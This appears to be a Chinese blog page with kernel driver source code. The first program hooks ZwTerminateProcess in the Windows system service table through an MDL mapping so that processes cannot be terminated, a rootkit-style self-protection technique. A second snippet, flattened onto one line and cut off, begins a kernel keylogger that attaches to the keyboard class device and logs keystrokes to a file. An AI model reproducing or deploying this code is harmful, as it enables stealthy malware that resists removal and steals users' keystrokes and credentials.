驱动Hook ZwTerminateProcess(mdl方式)

http://www.cnblogs.com/zhujian198/archive/2010/08/16/1800760.html


#include "ntddk.h"



typedef struct _SERVICE_DESCRIPTOR_TABLE
{
    PULONG ServiceTableBase;
    PULONG ServiceCounterTableBase;
    ULONG NumberOfServices;
    PUCHAR ParamTableBase;
} SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE;


__declspec(dllimport) SERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;


#define SYSCALL_INDEX(Service) *(PULONG)((PUCHAR)Service+1)


#define HOOK_SYSCALL(Service, HookService, OriginalService) \
    OriginalService = (PVOID)InterlockedExchange((PULONG)&SystemServiceTable[SYSCALL_INDEX(Service)], (ULONG)HookService)


#define UNHOOK_SYSCALL(Service, HookService, OriginalService) \
    InterlockedExchange((PULONG)&SystemServiceTable[SYSCALL_INDEX(Service)], (ULONG)OriginalService)


BOOLEAN                Hooked = FALSE;
MDL                    *Mdl = NULL;
PVOID                *SystemServiceTable;




NTSYSAPI
NTSTATUS
NTAPI
ZwTerminateProcess(
                   IN HANDLE ProcessHandle,
                   IN NTSTATUS ExitStatus
                   );


typedef NTSTATUS (NTAPI *NT_TERMINATE_PROCESS)
(
 IN HANDLE ProcessHandle,
 IN NTSTATUS ExitStatus
 );


NT_TERMINATE_PROCESS PtrNtTerminateProcess;




NTSTATUS HookNtTerminateProcess(
                                IN HANDLE ProcessHandle,
                                IN NTSTATUS ExitStatus)
{
    return STATUS_ACCESS_DENIED;
}


VOID DriverUnload(
                  IN DRIVER_OBJECT *DriverObject)
{
    if(Hooked)
    {
        UNHOOK_SYSCALL(ZwTerminateProcess, HookNtTerminateProcess, PtrNtTerminateProcess);


        if(Mdl)
        {
            MmUnmapLockedPages(SystemServiceTable, Mdl);


            IoFreeMdl(Mdl);
        }
    }
}


NTSTATUS DriverEntry(
                     IN DRIVER_OBJECT *DriverObject,
                     IN UNICODE_STRING *RegistryPath)
{
    DriverObject->DriverUnload = DriverUnload;




    Mdl = IoAllocateMdl(
                        KeServiceDescriptorTable.ServiceTableBase,                 
                        KeServiceDescriptorTable.NumberOfServices * sizeof(ULONG), 
                        FALSE,                                                     
                        FALSE,                                                     
                        NULL);                                                     


    if(Mdl)
    {
        MmBuildMdlForNonPagedPool(Mdl);


        Mdl->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA;


        SystemServiceTable = MmMapLockedPages(Mdl, KernelMode);


        if(MmIsAddressValid(SystemServiceTable))
        {
            HOOK_SYSCALL(ZwTerminateProcess, HookNtTerminateProcess, PtrNtTerminateProcess);


            Hooked = TRUE;
        }
    }


    return STATUS_SUCCESS;
}
C语言写的ROOT记录器,编译通过了.#include "stdafx.h" #include "ScanCode.h" #include "DriverEntry.h" #include <stdarg.h> const WCHAR *DEVICE_NAME = L"\\Device\\MonkeyKingDeviceName"; const WCHAR *SYMOBL_NAME = L"\\??\\MonkeyKingSymbolicName"; const char *NT_DEVICE_NAME = "\\Device\\KeyboardClass0"; const char *LOG_FILE_NAME = "\\DosDevices\\c:\\MonkeyKing.txt"; int numPendingIrps = 0; /*---------------------------------------------------------------------------------------------------------------------------------------------*/ /************************************************************************ * 函数名称:DriverEntry * 功能描述:初始化驱动程序,定位和申请硬件资源,创建内核对象 * 参数列表: pDriverObject:从I/O管理器中传进来的驱动对象 pRegistryPath:驱动程序在注册表的中的路径 * 返回 值:返回初始化驱动状态 *************************************************************************/ STDAPI_(NTSTATUS) DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) { NTSTATUS retValue = STATUS_SUCCESS; TRACEMSG("初始化例程..."); pDriverObject->DriverUnload = OnUnload; for (INT32 i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++){ pDriverObject->MajorFunction[i] = DispatchHandler; } pDriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead; TRACEMSG("初始化例程...完成"); //创建设备。 TRACEMSG("创建设备..."); PDEVICE_OBJECT pKeyboardDevice = NULL; if (!NT_SUCCESS(retValue = CreateDevice(pDriverObject, &pKeyboardDevice))) { TRACEMSG("创建设备...失败"); return retValue; } TRACEMSG("创建设备...完成。键盘设备对象指针为:0x%x", pKeyboardDevice); //挂接设备。 TRACEMSG("挂接设备..."); if (!NT_SUCCESS(retValue = HookKeyboard(pKeyboardDevice))) { TRACEMSG("挂接设备...失败"); return retValue; } TRACEMSG("挂接设备...完成"); TRACEMSG("初始化线程..."); if (!NT_SUCCESS(retValue = InitThreadLogger(pDriverObject))) { TRACEMSG("初始化线程...失败"); return retValue; } TRACEMSG("初始化线程...完成");
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值